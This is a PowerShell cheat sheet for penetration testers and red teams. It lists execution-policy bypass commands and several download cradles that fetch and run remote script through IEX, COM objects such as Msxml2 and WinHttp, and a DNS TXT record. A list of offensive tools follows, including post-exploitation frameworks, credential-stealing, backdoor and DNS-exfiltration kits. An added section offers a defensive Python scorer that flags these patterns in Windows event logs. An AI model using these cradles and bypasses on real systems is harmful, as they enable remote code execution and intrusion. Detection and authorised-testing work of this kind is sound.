Powershell modules and commands that come in handy for pentests and red team assessments.
PowerShell execution policies let you determine the conditions under which PowerShell loads configuration files and runs scripts.
You can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policy for computers and users.
Execution policies for the local computer and current user are stored in the registry. You do not need to set execution policies in your PowerShell profile. The execution policy for a particular session is stored only in memory and is lost when the session is closed.
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
Fire up powershell.exe and type in:
Get-ExecutionPolicy -List
To bypass the execution policy, run one of the following commands:
- PowerShell.exe -noprofile -
- powershell -nop
- Powershell -command "Command"
- Powershell -c
- powershell.exe -EncodedCommand $EncodedCommand
- invoke-command -scriptblock {Command}
- invoke-command -computername Computername -scriptblock {get-executionpolicy} | set-executionpolicy -force
- Get-Content .\powershellfile.ps1 | Invoke-Expression
- GC .\powershellfile.ps1 | iex
- PowerShell.exe -ExecutionPolicy Bypass
- PowerShell.exe -ExecutionPolicy UnRestricted
- PowerShell.exe -ExecutionPolicy RemoteSigned
- Disable-ExecutionPolicy
- Powershell.exe Set-ExecutionPolicy Bypass
- Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
- Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
- Powershell.exe -Exec Bypass
- Changing the registry value under: HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Simple Download Cradle
IEX (New-Object Net.Webclient).downloadstring("path-to-pwsh-script")
Simple Download Cradle For PowerShell 3.0+
IEX (iwr 'path-to-pwsh-script')
Hidden IE COM object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('path-to-pwsh-script');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText
WinHttp COM object
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText
DNS TXT approach: the code to execute must be stored as a base64-encoded string in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
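The same switches and cradles listed above are what a defender can key on in process-creation (event 4688) and script-block (event 4104) telemetry. The following is an added example, not code from the original page: a small Python scorer that runs the bypass and cradle patterns over constructed log lines and decodes any -EncodedCommand argument; the rule names, the sample events and the example.invalid URLs are assumptions made for the demo.

```python
# Added example: score constructed 4688/4104 log lines against the execution-policy
# bypass switches and download cradles catalogued above. Sample data is constructed.
import base64
import re

# powershell.exe resolves unambiguous parameter prefixes, so -ep, -ex and -exec all
# mean -ExecutionPolicy, and -enc, -ec and -e all mean -EncodedCommand.
RULES = {
    "execpolicy_switch": re.compile(r"-(?:ExecutionPolicy|Exec|Ex|EP)\s+(?:Bypass|Unrestricted)\b", re.I),
    "noprofile_switch": re.compile(r"\s-(?:NoProfile|nop)\b", re.I),
    "encoded_command": re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I),
    "set_executionpolicy": re.compile(r"Set-ExecutionPolicy\b.*\b(?:Bypass|Unrestricted)\b", re.I),
    "registry_policy_edit": re.compile(r"ShellIds\\Microsoft\.PowerShell", re.I),
    "iex_of_fetched_content": re.compile(
        r"(?:\biex\b|Invoke-Expression).*(?:DownloadString|DownloadFile|\biwr\b|Invoke-WebRequest|responseText|innerHTML)"
        r"|(?:DownloadString|\biwr\b|Invoke-WebRequest|responseText|innerHTML).*(?:\biex\b|Invoke-Expression)", re.I),
    "com_http_cradle": re.compile(r"Msxml2\.XMLHTTP|WinHttp\.WinHttpRequest|InternetExplorer\.Application", re.I),
    "dns_txt_cradle": re.compile(r"nslookup\s+-querytype=txt.*FromBase64String", re.I | re.S),
}

# Constructed sample events (not real telemetry); hosts are placeholders.
SAMPLE_EVENTS = [
    {"id": 4688, "text": r"powershell.exe -nop -ExecutionPolicy Bypass -File C:\Users\alice\build.ps1"},
    {"id": 4688, "text": "powershell.exe -nop -w hidden -EncodedCommand RwBlAHQALQBEAGEAdABlAA=="},
    {"id": 4104, "text": "IEX (New-Object Net.Webclient).downloadstring('http://example.invalid/s.ps1')"},
    {"id": 4104, "text": "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://example.invalid/s.ps1',$false);$h.send();iex $h.responseText"},
    {"id": 4104, "text": r"Set-ItemProperty HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell ExecutionPolicy Bypass"},
    {"id": 4104, "text": "Get-ChildItem C:\\Temp | Sort-Object Length"},
]

def decode_encoded_command(text):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = RULES["encoded_command"].search(text)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def scan(events):
    """One finding per event that matches at least one rule; score is the number of rules hit."""
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev["text"])]
        if hits:
            findings.append({"id": ev["id"], "rules": hits, "score": len(hits),
                             "decoded": decode_encoded_command(ev["text"])})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["id"], f["score"], ", ".join(f["rules"]), f["decoded"] or "")
```

Events that hit two or more rules (an IEX combined with a COM fetch, or -nop with an encoded command) are the ones worth triaging first; the benign Get-ChildItem line produces no finding.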
nishang - Offensive PowerShell for penetration testing and offensive security.
File System Security - Allows a much easier management of permissions on files and folders.
PowerForensics - Popular live disk forensics platform for Windows.
PowerSploit - Post-exploitation framework.
PowerShellEmpire - Post-exploitation agent.
PSReflect - Easily define in-memory enums, structs, and Win32 functions in PowerShell.
ADRecon - Gathers information about Active Directory and generates a report that gives a holistic picture of the current state of the target AD environment.
BloodHound - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
Invoke-Obfuscation - PowerShell command and script obfuscator.
PowerBreach - PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system.
PowerShellArsenal - A PowerShell module dedicated to reverse engineering.
Generate-Macro - PowerShell script that generates a malicious Microsoft Office document with a specified payload and persistence method.
Invoke-AltDSBackdoor - Obtains persistence on a Windows 7+ machine under both standard and administrative accounts by using two Alternate Data Streams.
Powershell-C2 - A PowerShell script to maintain persistence on a Windows machine.
mimikittenz - A post-exploitation PowerShell tool for extracting juicy info from memory.
InsecurePowerShell - PowerShell with some security features removed.
PoshC2 - PowerShell C2 server and implants.
p0wnedShell - PowerShell Runspace Post Exploitation Toolkit.
DNSExfiltrator - Data exfiltration over DNS request covert channel.
PowerCat - A PowerShell TCP/IP swiss army knife.